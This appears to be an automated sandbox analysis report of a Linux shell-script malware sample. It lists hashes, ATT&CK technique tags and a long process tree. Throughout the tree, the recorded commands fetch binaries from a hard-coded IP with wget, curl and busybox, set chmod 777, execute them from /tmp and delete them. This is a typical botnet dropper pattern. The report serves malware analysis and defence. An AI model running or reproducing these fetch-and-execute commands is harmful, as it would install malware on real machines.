Analysis
-
max time kernel
34s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
25/11/2024, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
-
Size
10KB
-
MD5
00e6a838ebbbb8d44e8bde3072d71948
-
SHA1
18ba68e4dc8af71f08dc42dc68055a295059cee5
-
SHA256
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be
-
SHA512
a8395ad7797c42c32a6f073151b82aea873fa6c842131b0899ee95e667e0038619feddfc236a5b12c834fb6a032f31a0cd79e3f931da05269dda866616ebdc14
-
SSDEEP
192:uTWqEbzElT+8s8V5fmlJRGmGxFNCiOn8s8V5alJRGm6xFNCi/WqEbzcq:unT+8s8V5fmlJRGmrn8s8V5alJRGmf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1486
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Writes file to tmp directory
PID:1493
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1500
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:1502
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1503
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1504
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1506
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1510
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1513
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1519
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1525
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1528
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1531
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1534
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1537
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1540
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1543
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1546
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1549
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1552
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1555
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1558
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1559
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1561
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1563
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1564
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1565
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1567
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1570
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1573
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1576
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1579
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1582
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1585
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1588
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1591
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1594
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1597
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1600
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1603
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1606
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1609
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1612
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1613
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1615
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1617
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1618
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1619
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1621
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1624
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1627
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1630
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1633
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1636
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1639
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1647
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1653
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1659
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1665
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1668
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97